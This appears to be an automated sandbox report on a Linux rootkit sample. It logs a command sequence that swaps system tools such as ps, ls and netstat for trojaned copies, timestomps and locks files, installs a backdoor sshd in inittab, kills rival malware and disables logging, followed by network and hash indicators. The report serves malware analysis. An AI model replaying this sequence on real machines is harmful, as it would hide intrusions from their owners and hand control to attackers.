[touch -acmr /bin/ls /lib/libsh.so]

/bin/mkdir

[mkdir /usr/lib/libsh]

/usr/bin/touch

[touch -acmr /bin/ls /usr/lib/libsh]

/bin/mv

[mv .sh/* /lib/libsh.so/]

/bin/mv

[mv .sh/.bashrc /usr/lib/libsh]

/bin/mv

[mv /lib/libsh.so/sshd /sbin/ttyload]

/bin/chmod

[chmod a+xr /sbin/ttyload]

/bin/chmod

[chmod o-w /sbin/ttyload]

/usr/bin/touch

[touch -acmr /bin/ls /sbin/ttyload]

/usr/bin/chattr

[chattr +isa /sbin/ttyload]

/bin/pidof

[pidof ttyload]

/bin/mv

[mv /tmp/bin/ttymon /sbin/ttymon]

/bin/chmod

[chmod a+xr /sbin/ttymon]

/usr/bin/touch

[touch -acmr /bin/ls /sbin/ttymon]

/usr/bin/chattr

[chattr +isa /sbin/ttymon]

/bin/pidof

[pidof ttymon]

/bin/cp

[cp /bin/bash /lib/libsh.so]

/usr/bin/chattr

[chattr -isa /etc/inittab]

/bin/grep

[grep -v ttyload]

/bin/cat

[cat /etc/inittab]

/bin/grep

[grep -v getty]

/bin/cat

[cat /etc/inittab]

/bin/grep

[grep getty]

/bin/cat

[cat /tmp/.init2]

/usr/bin/touch

[touch -acmr /bin/ls /usr/sbin/ttyload]

/bin/chmod

[chmod +x /usr/sbin/ttyload]

/usr/bin/chattr

[chattr +isa /usr/sbin/ttyload]

/usr/sbin/ttyload

[/usr/sbin/ttyload]

/sbin/ttyload

[/sbin/ttyload -q]

/sbin/ttymon

[/sbin/ttymon]

/usr/bin/touch

[touch -amcr /etc/inittab /tmp/.init1]

/bin/mv

[mv -f /tmp/.init1 /etc/inittab]

/bin/rm

[rm -rf /tmp/.init2]

/bin/grep

[grep ttyload /etc/inittab]

/usr/bin/md5sum

[/usr/bin/md5sum /bin/ps]

/usr/bin/md5sum

[/usr/bin/md5sum /bin/ls]

/usr/bin/md5sum

[/usr/bin/md5sum /usr/bin/find]

/usr/bin/md5sum

[/usr/bin/md5sum /usr/bin/top]

/usr/bin/md5sum

[/usr/bin/md5sum /usr/bin/md5sum]

/tmp/encrypt

[./encrypt -e .shmd5 /dev/srd0]

/usr/bin/touch

[touch -acmr /bin/ls /dev/srd0]

/usr/bin/chattr

[chattr a+r /dev/srd0]

/bin/chown

[chown -f root:root /dev/srd0]

/bin/rm

[rm -rf .shmd5]

/usr/bin/touch

[touch -acmr /sbin/ifconfig ifconfig]

/usr/bin/touch

[touch -acmr /bin/ps ps]

/usr/bin/touch

[touch -acmr /bin/ls ls]

/usr/bin/touch

[touch -acmr /bin/netstat netstat]

/usr/bin/touch

[touch -acmr /usr/bin/find find]

/usr/bin/touch

[touch -acmr /usr/bin/top top]

/usr/bin/touch

[touch -acmr /usr/sbin/lsof lsof]

/usr/bin/touch

[touch -acmr /sbin/syslogd syslogd]

/usr/bin/touch

[touch -acmr /usr/bin/slocate slocate]

/usr/bin/touch

[touch -acmr /usr/bin/dir dir]

/usr/bin/touch

[touch -acmr /usr/bin/md5sum md5sum]

/usr/bin/touch

[touch -acmr /usr/bin/pstree pstree]

/bin/mkdir

[mkdir /usr/lib/libsh/.backup]

/usr/bin/chattr

[chattr -isa /bin/ps]

/bin/cp

[cp /bin/ps /usr/lib/libsh/.backup]

/bin/mv

[mv -f ps /bin/ps]

/usr/bin/chattr

[chattr +isa /bin/ps]

/usr/bin/chattr

[chattr -isa /sbin/ifconfig]

/bin/cp

[cp /sbin/ifconfig /usr/lib/libsh/.backup]

/bin/mv

[mv -f ifconfig /sbin/ifconfig]

/usr/bin/chattr

[chattr +isa /sbin/ifconfig]

/usr/bin/chattr

[chattr -isa /bin/netstat]

/bin/cp

[cp /bin/netstat /usr/lib/libsh/.backup]

/bin/mv

[mv -f netstat /bin/netstat]

/usr/bin/chattr

[chattr +isa /bin/netstat]

/usr/bin/chattr

[chattr -isa /usr/bin/top]

/bin/cp

[cp /usr/bin/top /usr/lib/libsh/.backup]

/bin/mv

[mv -f top /usr/bin/top]

/usr/bin/chattr

[chattr +isa /usr/bin/top]

/usr/bin/chattr

[chattr -isa /bin/ls]

/bin/cp

[cp /bin/ls /usr/lib/libsh/.backup]

/bin/mv

[mv -f ls /bin/ls]

/usr/bin/chattr

[chattr +isa /bin/ls]

/usr/bin/chattr

[chattr -isa /usr/bin/find]

/bin/cp

[cp /usr/bin/find /usr/lib/libsh/.backup]

/bin/mv

[mv -f find /usr/bin/find]

/usr/bin/chattr

[chattr +isa /usr/bin/find]

/usr/bin/chattr

[chattr -isa /usr/bin/pstree]

/bin/cp

[cp /usr/bin/pstree /usr/lib/libsh/.backup]

/bin/mv

[mv -f pstree /usr/bin/pstree]

/usr/bin/chattr

[chattr +isa /usr/bin/pstree]

/usr/bin/chattr

[chattr -isa /usr/bin/md5sum]

/bin/cp

[cp /usr/bin/md5sum /usr/lib/libsh/.backup]

/bin/mv

[mv -f md5sum /usr/bin/md5sum]

/usr/bin/chattr

[chattr +isa /usr/bin/md5sum]

/usr/bin/touch

[touch -acmr /bin/ls /tmp/utilz]

/usr/bin/touch

[touch -acmr /bin/ls /tmp/utilz/*]

/bin/mv

[mv /tmp/utilz /usr/lib/libsh/]

/bin/mkdir

[mkdir /usr/lib/libsh/.sniff]

/bin/mv

[mv /tmp/bin/shsniff /usr/lib/libsh/.sniff/shsniff]

/bin/mv

[mv /tmp/bin/shp /usr/lib/libsh/.sniff/shp]

/bin/mv

[mv /tmp/bin/shsb /usr/lib/libsh/shsb]

/bin/mv

[mv /tmp/bin/hide /usr/lib/libsh/hide]

/usr/bin/touch

[touch -acmr /bin/ls /usr/lib/libsh/.sniff/shsniff]

/usr/bin/touch

[touch -acmr /bin/ls /usr/lib/libsh/.sniff/shp]

/usr/bin/touch

[touch -acmr /bin/ls /usr/lib/libsh/shsb]

/usr/bin/touch

[touch -acmr /bin/ls /usr/lib/libsh/hide]

/bin/chmod

[chmod +x /usr/lib/libsh/.sniff/*]

/bin/chmod

[chmod +x /usr/lib/libsh/shsb]

/bin/chmod

[chmod +x /usr/lib/libsh/hide]

/bin/ps

[ps aux]

/bin/cat

[cat /tmp/.procs]

/bin/grep

[grep named]

/bin/cat

[cat /tmp/.procs]

/bin/grep

[grep smbd]

/bin/cat

[cat /tmp/.procs]

/bin/grep

[grep rpc.statd]

/bin/rm

[rm -rf /tmp/.procs]

/bin/cat

[cat /tmp/.stats]

/bin/grep

[grep 443]

/bin/grep

[grep http]

/bin/rm

[rm -rf /tmp/.stats]

/bin/mkdir

[mkdir /usr/lib/libsh/.owned]

/usr/bin/chattr

[chattr +isa /usr/lib/libsh]

/usr/bin/chattr

[chattr +isa /lib/libsh.so]

/usr/bin/killall

[killall -9 -q nscd]

/usr/bin/killall

[killall -9 -q xntps]

/usr/bin/killall

[killall -9 -q mountd]

/usr/bin/killall

[killall -9 -q mserv]

/usr/bin/killall

[killall -9 -q psybnc]

/usr/bin/killall

[killall -9 -q t0rns]

/usr/bin/killall

[killall -9 -q linsniffer]

/usr/bin/killall

[killall -9 -q sniffer]

/usr/bin/killall

[killall -9 -q lpsched]

/usr/bin/killall

[killall -9 -q sniff]

/usr/bin/killall

[killall -9 -q sn1f]

/usr/bin/killall

[killall -9 -q sshd2]

/usr/bin/killall

[killall -9 -q xsf]

/usr/bin/killall

[killall -9 -q xchk]

/usr/bin/killall

[killall -9 -q ssh2d]

/sbin/ifconfig

[/sbin/ifconfig eth0]

/bin/grep

[grep inet addr:]

/usr/bin/cut

[cut -c6-]

/usr/bin/awk

[awk -F {print $2} ]

/bin/hostname

[hostname -f]

/bin/uname

[uname -a]

/usr/bin/awk

[awk { print $11 }]

/bin/cat

[cat /tmp/info_tmp]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep bogomips]

/usr/bin/awk

[awk {print $3}]

/bin/hostname

[hostname -i]

/sbin/ifconfig

[/sbin/ifconfig]

/bin/grep

[grep eth]

/usr/bin/wc

[wc -l]

/usr/bin/head

[head -1 /etc/debian_version]

/bin/rm

[rm -rf /tmp/info_tmp]

/bin/date

[date +%S]

/usr/bin/expr

[expr 47 - 15]

/sbin/iptables

[/sbin/iptables -L input]

/usr/bin/head

[head -5]

/sbin/syslogd

[/sbin/syslogd -m 0]

/bin/rm

[rm -rf ../shv5*]

Network

Country Destination Domain Proto
US 1.1.1.1:53 debian9-mipsel-20240611-en-3 udp
US 1.1.1.1:53 debian9-mipsel-20240611-en-3 udp
US 1.1.1.1:53 debian9-mipsel-20240611-en-3 udp

Files

/var/cache/ldconfig/aux-cache~

/etc/sh.conf

/lib/libsh.so/bash

/tmp/.init1

/tmp/.init1

/tmp/.init1

/tmp/.init1

/tmp/.init1

/usr/sbin/ttyload

/usr/sbin/ttyload

/tmp/.shmd5

/tmp/.shmd5

/tmp/.shmd5

/tmp/.shmd5

/tmp/.shmd5

/usr/lib/libsh/.backup/ps

/usr/lib/libsh/.backup/top

/usr/lib/libsh/.backup/ls

/usr/lib/libsh/.backup/find

/usr/lib/libsh/.backup/pstree

/usr/lib/libsh/.backup/md5sum

/tmp/.procs

/tmp/info_tmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-15 23:17

Reported

2024-07-15 23:19

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

4s

Max time network

129s

Command Line

[/tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /usr/sbin/ttyload /usr/sbin/ttyload N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /bin/hostname N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A

Enumerates running processes

Write file to user bin folder

Description Indicator Process Target
File opened for modification /usr/sbin/ttyload /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A

Checks CPU configuration

antivm

Description Indicator Process Target
File opened for reading /proc/cpuinfo /bin/cat N/A

Reads CPU attributes

Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/4/stat /usr/bin/killall N/A
File opened for reading /proc/5/stat /usr/bin/killall N/A
File opened for reading /proc/600/stat /usr/bin/killall N/A
File opened for reading /proc/1296/cmdline /usr/bin/killall N/A
File opened for reading /proc/1499/cmdline /usr/bin/killall N/A
File opened for reading /proc/28/stat /usr/bin/killall N/A
File opened for reading /proc/25/stat /usr/bin/killall N/A
File opened for reading /proc/204/stat /usr/bin/killall N/A
File opened for reading /proc/115/stat /usr/bin/killall N/A
File opened for reading /proc/1500/stat /usr/bin/killall N/A
File opened for reading /proc/513/stat /usr/bin/killall N/A
File opened for reading /proc/1127/stat /bin/pidof N/A
File opened for reading /proc/512/status /bin/ps N/A
File opened for reading /proc/565/cmdline /usr/bin/killall N/A
File opened for reading /proc/1127/cmdline /usr/bin/killall N/A
File opened for reading /proc/777/cmdline /usr/bin/killall N/A
File opened for reading /proc/984/stat /usr/bin/killall N/A
File opened for reading /proc/1136/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/1296/stat /bin/pidof N/A
File opened for reading /proc/25/stat /bin/ps N/A
File opened for reading /proc/777/stat /usr/bin/killall N/A
File opened for reading /proc/21/stat /usr/bin/killall N/A
File opened for reading /proc/1305/cmdline /usr/bin/killall N/A
File opened for reading /proc/160/stat /usr/bin/killall N/A
File opened for reading /proc/204/cmdline /usr/bin/killall N/A
File opened for reading /proc/163/stat /usr/bin/killall N/A
File opened for reading /proc/1248/cmdline /usr/bin/killall N/A
File opened for reading /proc/166/stat /usr/bin/killall N/A
File opened for reading /proc/440/stat /usr/bin/killall N/A
File opened for reading /proc/1183/stat /usr/bin/killall N/A
File opened for reading /proc/174/stat /usr/bin/killall N/A
File opened for reading /proc/29/stat /usr/bin/killall N/A
File opened for reading /proc/1119/stat /usr/bin/killall N/A
File opened for reading /proc/1147/stat /usr/bin/killall N/A
File opened for reading /proc/992/stat /bin/pidof N/A
File opened for reading /proc/528/stat /bin/ps N/A
File opened for reading /proc/1/stat /usr/bin/killall N/A
File opened for reading /proc/442/cmdline /usr/bin/killall N/A
File opened for reading /proc/1144/stat /usr/bin/killall N/A
File opened for reading /proc/137/stat /usr/bin/killall N/A
File opened for reading /proc/984/cmdline /bin/pidof N/A
File opened for reading /proc/5/cmdline /bin/pidof N/A
File opened for reading /proc/161/stat /bin/pidof N/A
File opened for reading /proc/468/stat /usr/bin/killall N/A
File opened for reading /proc/83/stat /bin/pidof N/A
File opened for reading /proc/89/cmdline /bin/pidof N/A
File opened for reading /proc/1016/stat /usr/bin/killall N/A
File opened for reading /proc/1180/stat /usr/bin/killall N/A
File opened for reading /proc/159/stat /usr/bin/killall N/A
File opened for reading /proc/1310/status /bin/ps N/A
File opened for reading /proc/992/stat /usr/bin/killall N/A
File opened for reading /proc/78/stat /usr/bin/killall N/A
File opened for reading /proc/1142/stat /usr/bin/killall N/A
File opened for reading /proc/17/stat /usr/bin/killall N/A
File opened for reading /proc/174/stat /usr/bin/killall N/A
File opened for reading /proc/1068/cmdline /usr/bin/killall N/A
File opened for reading /proc/322/status /bin/ps N/A
File opened for reading /proc/468/stat /usr/bin/killall N/A
File opened for reading /proc/1284/cmdline /usr/bin/killall N/A
File opened for reading /proc/1/stat /usr/bin/killall N/A
File opened for reading /proc/1058/stat /usr/bin/killall N/A
File opened for reading /proc/1505/cmdline /usr/bin/killall N/A
File opened for reading /proc/1182/cmdline /bin/pidof N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.stats /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/info_tmp /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/bin/.sh/sshd_config /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/conf/hosts.h /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/.init1 /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/.init2 /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/.shmd5 /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/.procs /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A

Processes

/tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118

[/tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118]

/usr/bin/whoami

[whoami]

/bin/tar

[tar zxf ./bin.tgz]

/bin/tar

[tar zxf ./conf.tgz]

/bin/tar

[tar zxf ./lib.tgz]

/bin/tar

[tar zxf ./utilz.tgz]

/bin/tar

[tar zxf ./sshd.tgz]

/bin/rm

[rm -rf ./sshd.tgz]

/bin/rm

[rm -rf bin.tgz conf.tgz lib.tgz utilz.tgz]

/bin/sleep

[sleep 2]

/usr/bin/killall

[killall -9 syslogd]

/bin/date

[date +%S]

/bin/sleep

[sleep 2]

/bin/hostname

[hostname -f]

/usr/bin/cut

[cut -d @ -f 2]

/bin/grep

[grep @]

/bin/grep

[grep -v ^$]

/bin/grep

[grep -v ^# /etc/syslog.conf]

/bin/uname

[uname -n]

/bin/mv

[mv lib/libproc.a /lib/]

/bin/mv

[mv lib/libproc.so.2.0.6 /lib/]

/sbin/ldconfig

[/sbin/ldconfig]

/sbin/ldconfig.real

[/sbin/ldconfig.real]

/usr/bin/md5sum

[md5sum]

/usr/bin/touch

[touch -acmr /bin/ls /etc/sh.conf]

/bin/chown

[chown -f root:root /etc/sh.conf]

/usr/bin/chattr

[chattr +isa /etc/sh.conf]

/bin/rm

[rm -rf /tmp/bin/.sh/shdcf2]

/bin/mv

[mv /tmp/bin/.sh/sshd_config /tmp/bin/.sh/shdcf]

/bin/mv

[mv /tmp/conf/lidps1.so /lib/lidps1.so]

/usr/bin/touch

[touch -acmr /bin/ls /lib/lidps1.so]

/usr/bin/touch

[touch -acmr /bin/ls /tmp/conf/*]

/bin/mv

[mv /tmp/conf/* /usr/include/]

/bin/mkdir

[mkdir /lib/libsh.so]

/usr/bin/touch

[touch -acmr /bin/ls /lib/libsh.so]

/bin/mkdir

[mkdir /usr/lib/libsh]

/usr/bin/touch

[touch -acmr /bin/ls /usr/lib/libsh]

/bin/mv

[mv .sh/* /lib/libsh.so/]

/bin/mv

[mv .sh/.bashrc /usr/lib/libsh]

/bin/mv

[mv /lib/libsh.so/sshd /sbin/ttyload]

/bin/chmod

[chmod a+xr /sbin/ttyload]

/bin/chmod

[chmod o-w /sbin/ttyload]

/usr/bin/touch

[touch -acmr /bin/ls /sbin/ttyload]

/usr/bin/chattr

[chattr +isa /sbin/ttyload]

/bin/pidof

[pidof ttyload]

/bin/mv

[mv /tmp/bin/ttymon /sbin/ttymon]

/bin/chmod

[chmod a+xr /sbin/ttymon]

/usr/bin/touch

[touch -acmr /bin/ls /sbin/ttymon]

/usr/bin/chattr

[chattr +isa /sbin/ttymon]

/bin/pidof

[pidof ttymon]

/bin/cp

[cp /bin/bash /lib/libsh.so]

/usr/bin/chattr

[chattr -isa /etc/inittab]

/bin/grep

[grep -v getty]

/bin/grep

[grep -v ttyload]

/bin/cat

[cat /etc/inittab]

/bin/grep

[grep getty]

/bin/cat

[cat /etc/inittab]

/bin/cat

[cat /tmp/.init2]

/usr/bin/touch

[touch -acmr /bin/ls /usr/sbin/ttyload]

/bin/chmod

[chmod +x /usr/sbin/ttyload]

/usr/bin/chattr

[chattr +isa /usr/sbin/ttyload]

/usr/sbin/ttyload

[/usr/sbin/ttyload]

/sbin/ttyload

[/sbin/ttyload -q]

/sbin/ttymon

[/sbin/ttymon]

/usr/bin/touch

[touch -amcr /etc/inittab /tmp/.init1]

/bin/mv

[mv -f /tmp/.init1 /etc/inittab]

/bin/rm

[rm -rf /tmp/.init2]

/bin/grep

[grep ttyload /etc/inittab]

/usr/bin/md5sum

[/usr/bin/md5sum /bin/ps]

/usr/bin/md5sum

[/usr/bin/md5sum /bin/ls]

/usr/bin/md5sum

[/usr/bin/md5sum /usr/bin/find]

/usr/bin/md5sum

[/usr/bin/md5sum /usr/bin/top]

/usr/bin/md5sum

[/usr/bin/md5sum /usr/bin/md5sum]

/tmp/encrypt

[./encrypt -e .shmd5 /dev/srd0]

/usr/bin/touch

[touch -acmr /bin/ls /dev/srd0]

/usr/bin/chattr

[chattr a+r /dev/srd0]

/bin/chown

[chown -f root:root /dev/srd0]

/bin/rm

[rm -rf .shmd5]

/usr/bin/touch

[touch -acmr /sbin/ifconfig ifconfig]

/usr/bin/touch

[touch -acmr /bin/ps ps]

/usr/bin/touch

[touch -acmr /bin/ls ls]

/usr/bin/touch

[touch -acmr /bin/netstat netstat]

/usr/bin/touch

[touch -acmr /usr/bin/find find]

/usr/bin/touch

[touch -acmr /usr/bin/top top]

/usr/bin/touch

[touch -acmr /usr/sbin/lsof lsof]

/usr/bin/touch

[touch -acmr /sbin/syslogd syslogd]

/usr/bin/touch

[touch -acmr /usr/bin/slocate slocate]

/usr/bin/touch

[touch -acmr /usr/bin/dir dir]

/usr/bin/touch

[touch -acmr /usr/bin/md5sum md5sum]

/usr/bin/touch

[touch -acmr /usr/bin/pstree pstree]

/bin/mkdir

[mkdir /usr/lib/libsh/.backup]

/usr/bin/chattr

[chattr -isa /bin/ps]

/bin/cp

[cp /bin/ps /usr/lib/libsh/.backup]

/bin/mv

[mv -f ps /bin/ps]

/usr/bin/chattr

[chattr +isa /bin/ps]

/usr/bin/chattr

[chattr -isa /sbin/ifconfig]

/bin/cp

[cp /sbin/ifconfig /usr/lib/libsh/.backup]

/bin/mv

[mv -f ifconfig /sbin/ifconfig]

/usr/bin/chattr

[chattr +isa /sbin/ifconfig]

/usr/bin/chattr

[chattr -isa /bin/netstat]

/bin/cp

[cp /bin/netstat /usr/lib/libsh/.backup]

/bin/mv

[mv -f netstat /bin/netstat]

/usr/bin/chattr

[chattr +isa /bin/netstat]

/usr/bin/chattr

[chattr -isa /usr/bin/top]

/bin/cp

[cp /usr/bin/top /usr/lib/libsh/.backup]

/bin/mv

[mv -f top /usr/bin/top]

/usr/bin/chattr

[chattr +isa /usr/bin/top]

/usr/bin/chattr

[chattr -isa /bin/ls]

/bin/cp

[cp /bin/ls /usr/lib/libsh/.backup]

/bin/mv

[mv -f ls /bin/ls]

/usr/bin/chattr

[chattr +isa /bin/ls]

/usr/bin/chattr

[chattr -isa /usr/bin/find]

/bin/cp

[cp /usr/bin/find /usr/lib/libsh/.backup]

/bin/mv

[mv -f find /usr/bin/find]

/usr/bin/chattr

[chattr +isa /usr/bin/find]

/usr/bin/chattr

[chattr -isa /usr/bin/pstree]

/bin/cp

[cp /usr/bin/pstree /usr/lib/libsh/.backup]

/bin/mv

[mv -f pstree /usr/bin/pstree]

/usr/bin/chattr

[chattr +isa /usr/bin/pstree]

/usr/bin/chattr

[chattr -isa /usr/bin/md5sum]

/bin/cp

[cp /usr/bin/md5sum /usr/lib/libsh/.backup]

/bin/mv

[mv -f md5sum /usr/bin/md5sum]

/usr/bin/chattr

[chattr +isa /usr/bin/md5sum]

/usr/bin/touch

[touch -acmr /bin/ls /tmp/utilz]

/usr/bin/touch

[touch -acmr /bin/ls /tmp/utilz/*]

/bin/mv

[mv /tmp/utilz /usr/lib/libsh/]

/bin/mkdir

[mkdir /usr/lib/libsh/.sniff]

/bin/mv

[mv /tmp/bin/shsniff /usr/lib/libsh/.sniff/shsniff]

/bin/mv

[mv /tmp/bin/shp /usr/lib/libsh/.sniff/shp]

/bin/mv

[mv /tmp/bin/shsb /usr/lib/libsh/shsb]

/bin/mv

[mv /tmp/bin/hide /usr/lib/libsh/hide]

/usr/bin/touch

[touch -acmr /bin/ls /usr/lib/libsh/.sniff/shsniff]

/usr/bin/touch

[touch -acmr /bin/ls /usr/lib/libsh/.sniff/shp]

/usr/bin/touch

[touch -acmr /bin/ls /usr/lib/libsh/shsb]

/usr/bin/touch

[touch -acmr /bin/ls /usr/lib/libsh/hide]

/bin/chmod

[chmod +x /usr/lib/libsh/.sniff/*]

/bin/chmod

[chmod +x /usr/lib/libsh/shsb]

/bin/chmod

[chmod +x /usr/lib/libsh/hide]

/bin/ps

[ps aux]

/bin/grep

[grep named]

/bin/cat

[cat /tmp/.procs]

/bin/grep

[grep smbd]

/bin/cat

[cat /tmp/.procs]

/bin/grep

[grep rpc.statd]

/bin/cat

[cat /tmp/.procs]

/bin/rm

[rm -rf /tmp/.procs]

/bin/grep

[grep http]

/bin/grep

[grep 443]

/bin/cat

[cat /tmp/.stats]

/bin/rm

[rm -rf /tmp/.stats]

/bin/mkdir

[mkdir /usr/lib/libsh/.owned]

/usr/bin/chattr

[chattr +isa /usr/lib/libsh]

/usr/bin/chattr

[chattr +isa /lib/libsh.so]

/usr/bin/killall

[killall -9 -q nscd]

/usr/bin/killall

[killall -9 -q xntps]

/usr/bin/killall

[killall -9 -q mountd]

/usr/bin/killall

[killall -9 -q mserv]

/usr/bin/killall

[killall -9 -q psybnc]

/usr/bin/killall

[killall -9 -q t0rns]

/usr/bin/killall

[killall -9 -q linsniffer]

/usr/bin/killall

[killall -9 -q sniffer]

/usr/bin/killall

[killall -9 -q lpsched]

/usr/bin/killall

[killall -9 -q sniff]

/usr/bin/killall

[killall -9 -q sn1f]

/usr/bin/killall

[killall -9 -q sshd2]

/usr/bin/killall

[killall -9 -q xsf]

/usr/bin/killall

[killall -9 -q xchk]

/usr/bin/killall

[killall -9 -q ssh2d]

/usr/bin/cut

[cut -c6-]

/usr/bin/awk

[awk -F {print $2} ]

/bin/grep

[grep inet addr:]

/sbin/ifconfig

[/sbin/ifconfig eth0]

/bin/hostname

[hostname -f]

/usr/bin/awk

[awk { print $11 }]

/bin/uname

[uname -a]

/bin/cat

[cat /tmp/info_tmp]

/usr/bin/awk

[awk {print $3}]

/bin/grep

[grep bogomips]

/bin/cat

[cat /proc/cpuinfo]

/bin/hostname

[hostname -i]

/usr/bin/wc

[wc -l]

/bin/grep

[grep eth]

/sbin/ifconfig

[/sbin/ifconfig]

/usr/bin/head

[head -1 /etc/debian_version]

/bin/rm

[rm -rf /tmp/info_tmp]

/bin/date

[date +%S]

/usr/bin/expr

[expr 14 - 12]

/usr/bin/head

[head -5]

/sbin/iptables

[/sbin/iptables -L input]

/sbin/syslogd

[/sbin/syslogd -m 0]

/bin/rm

[rm -rf ../shv5*]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
GB 185.125.188.62:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
US 151.101.193.91:443 tcp
GB 195.181.164.15:443 tcp

Files

/var/cache/ldconfig/aux-cache~

MD5 52b4ccbad7807f5a2f34d1379dab1109
SHA1 fc15ce78d0bc4ae915b2ad57d4500d742d81ea44
SHA256 87070051536cd04382ef5585cf305cc95eb25910281f6b1201b3d22ee44bd0d9
SHA512 93f9112e421ee3472b29a42bca073c088f0b8948a8fdf092c38d9978c00e30f4bef474a2af27f468d5b8ee8d601c43588e8fe1e1c1cc874addcb590098298edb

/lib/libsh.so/bash

MD5 d5d689ba6020abe746c52ae7438d9eb2
SHA1 0a4ece3b3c332c39922b8d521c8f2087e9cf22b6
SHA256 15d4469eb3da716fefcc0c395a5b1d1657ad0555ec3ae623e727bb0dfcee19cf
SHA512 ae2459b496385844c20813e8fdc6c227facc6b16cd1bfcc467eb61309cb8316b5dc44d66c13de1a7a1c248a546654bc51128f6d1f2f8bb92f7e9f1898cec415e

/tmp/.init1

MD5 ba6ed6a3d425270d5374b0c2b54b3008
SHA1 58635a2e5fa938e55f777cb55a6df5fe44f6b4ec
SHA256 91c48fb19d87c95033df44d44e58474ab5e2a7176d231c11bb5e45c7d52fa359
SHA512 6f2ecc0fe867ec1cc575dc8cbba8566ac32dea4252b355f4267afb18d15dd759baecac3d8b74656a6008b7d20be3033ee4650f8b9cece8c2eb2466dc6fcecd0c

/tmp/.init1

MD5 0dae4739f83623a59236ecfabe00007b
SHA1 4b2b361ba9cf76213d2c4d6ba67e80099405f810
SHA256 513dfa0b7341549c6141df2ebdf1eedf72f1904d47725a17213b3bcb80916ac0
SHA512 12ab203d1434f29cf4b5f81d72a0790d9ddacd20df5d71e2a0d429b2bc8c80cff5c4a4c1332452deb9d84817088a1223f55ef2411f0605cfbe00eb2fe8aa1d74

/tmp/.init1

MD5 21df30feebe94d25ce99e861e3642895
SHA1 3624439d7e9ac4463f83f1658205367ef27a2234
SHA256 d3bfdb3e0f63a093f8e9bff6925ddc52429fe09fe4de521add28b373d44fe0f5
SHA512 26fbc52d5c2984a74673397e6edce3bf8a14e4d52a1abc7ffdfbf1bae9768b2583512632625d01bac896c623b0ec10fa24f6aa3c54ec2a70450b02d9bb37cecb

/tmp/.init1

MD5 74e8461d4c9dd715082f15ef51e3ecac
SHA1 0504be0510ac79c4f7c8d5477032408f9b63a651
SHA256 9fff95a586ab017f278fbf2f579d424e29164b5fae02f509176b9a600c4091de
SHA512 0682c5966466f49b1f53b872e5f10a4264f11a65f198f8e780365e6c683899815f90613cf8cd900d7b8d47247c343ab6002183a405313ac07fe026a2f634e02c

/tmp/.init1

MD5 8c053b4b674ebfcf6d38503608c5c8db
SHA1 9927d232e5bb15e3b6bbe461e0041d74649b963a
SHA256 6bdd745ccb67873f8e05c871ea6f153bb4daa683d7873e22c93fa716f53f61dc
SHA512 35320ff6eed384649f02262a46bf9fdabdcf1f9808738b7c6af3fea01a1b54c963d038c984c3d794445030632ab1ae38c8d6bbf319a362233a40ac9314a55222

/usr/sbin/ttyload

MD5 b46702355aecfc0bd14c525655eccb8b
SHA1 85ae2258fdf63f04130470356e4d0ba13cce49b4
SHA256 d4fe551995b5a5c5c71656ad1bf102c790f0a8a8415e1331ee9948e451a23db7
SHA512 db411c4f553c0eefd8672bf395679d48fe7dd9ad467d2ee5e738dd62815b2091c191c32db87bf88ae1aad3689a020c2e565091e1086f5fd1733c75847091f151

/usr/sbin/ttyload

MD5 53e75bf7964b0fb15cbe3028a151ed65
SHA1 116589e3b65166f73be2c6e8bb3b09c07641a762
SHA256 550618b776401129e1bf6000bc28a7891ab0a6431bac3382be1ee1a585282805
SHA512 ec2f45bc08e02e16db6db32bb71daff158c4044ed7268b696a62bf0efe9de59c331d6afb0b9101b5686e41cc701c491d75b0617c18bb68fb3393bea2ba702316

/tmp/.shmd5

MD5 e5f6d25a37ab24a48c82631b89bbad91
SHA1 bff487e8094ae83d1f22e9aa8c1299b18d5ee945
SHA256 8a0a7a94db129cb5992937e60ca4987517d47478ddb717cde31db4201e47f13e
SHA512 ca1a1d98c2774f6117001d76eaae5898754d2f72c58ad72e3bb295ee8fa36b9e3336a7193ab0384a2765fbc1a15f0de1280322687001e316c4fd0cdaf24093c1

/tmp/.shmd5

MD5 07bdf03254d1a560efa2e429faf99bc9
SHA1 14a6a0c13e10302d373fc7dd749bd02d826575ae
